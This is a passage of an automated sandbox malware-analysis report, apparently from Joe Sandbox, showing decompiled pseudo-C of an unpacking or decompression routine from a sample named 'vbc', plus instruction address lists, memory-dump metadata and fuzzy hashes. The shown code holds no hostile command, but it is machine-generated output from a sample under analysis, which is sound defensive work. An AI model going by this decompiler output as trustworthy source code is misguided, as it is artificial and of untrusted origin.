                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          											L142:
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											L156:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											while(1) {
                          												L140:
                          												 *(_t644 - 0x88) = _t537;
                          												goto L1;
                          											}
                          										case 0x15:
                          											L91:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											goto L0;
                          										case 0x17:
                          											while(1) {
                          												L145:
                          												 *(_t644 - 0x50) = 1;
                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          										case 0x18:
                          											goto L146;
                          										case 0x19:
                          											L94:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												L98:
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													L166:
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												L121:
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												L122:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											L95:
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												L97:
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													L107:
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														L118:
                          														_t391 = __ebp - 0x2c;
                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													L113:
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														L117:
                          														goto L109;
                          													}
                          												}
                          												L103:
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													L106:
                          													goto L99;
                          												}
                          											}
                          											L96:
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L162:
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											L57:
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L163:
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											L77:
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												L124:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L127:
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											L167:
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t539 = _t538 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          					}
                          				}
                          			}















                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406688
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00406745
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00000000
                          0x0040646a
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x00406548
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067b4
                          0x0040677d

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                          • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406682() {
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int* _t605;
                          				void* _t612;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t612 - 0x40) != 0) {
                          						 *(_t612 - 0x84) = 0x13;
                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x4c);
                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          						__ecx =  *(__ebp - 0x58);
                          						__eax =  *(__ebp - 0x4c) << 4;
                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                          						L130:
                          						 *(__ebp - 0x58) = __eax;
                          						 *(__ebp - 0x40) = 3;
                          						L144:
                          						 *(__ebp - 0x7c) = 0x14;
                          						L145:
                          						__eax =  *(__ebp - 0x40);
                          						 *(__ebp - 0x50) = 1;
                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          						L149:
                          						if( *(__ebp - 0x48) <= 0) {
                          							__ecx =  *(__ebp - 0x40);
                          							__ebx =  *(__ebp - 0x50);
                          							0 = 1;
                          							__eax = 1 << __cl;
                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          							__eax =  *(__ebp - 0x7c);
                          							 *(__ebp - 0x44) = __ebx;
                          							while(1) {
                          								L140:
                          								 *(_t612 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t612 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          										case 0:
                          											if( *(_t612 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t534 =  *( *(_t612 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t569);
                          											_push(9);
                          											_pop(_t570);
                          											_t608 = _t538 / _t569;
                          											_t540 = _t538 % _t569 & 0x000000ff;
                          											asm("cdq");
                          											_t603 = _t540 % _t570 & 0x000000ff;
                          											 *(_t612 - 0x3c) = _t603;
                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                          												L10:
                          												if(_t611 == 0) {
                          													L12:
                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t611 = _t611 - 1;
                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                          												} while (_t611 != 0);
                          												goto L12;
                          											}
                          											if( *(_t612 - 4) != 0) {
                          												GlobalFree( *(_t612 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t612 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t45 = _t612 - 0x48;
                          											 *_t45 =  *(_t612 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t612 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t612 - 0x40);
                          											if(_t546 ==  *(_t612 - 0x74)) {
                          												L20:
                          												 *(_t612 - 0x48) = 5;
                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t612 - 0x74) = _t546;
                          											if( *(_t612 - 8) != 0) {
                          												GlobalFree( *(_t612 - 8));
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                          											 *(_t612 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                          											 *(_t612 - 0x84) = 6;
                          											 *(_t612 - 0x4c) = _t553;
                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											_t67 = _t612 - 0x70;
                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                          											if( *(_t612 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t605;
                          											_t588 = _t531 & 0x0000ffff;
                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                          											if( *(_t612 - 0xc) >= _t564) {
                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                          												 *(_t612 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
